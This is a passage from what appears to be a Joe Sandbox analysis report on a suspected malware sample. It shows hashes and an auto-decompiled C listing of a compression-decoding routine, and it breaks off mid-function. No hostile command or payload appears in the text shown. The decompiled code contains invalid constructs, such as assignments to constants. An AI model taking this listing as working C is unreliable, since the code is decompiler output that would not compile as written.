Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
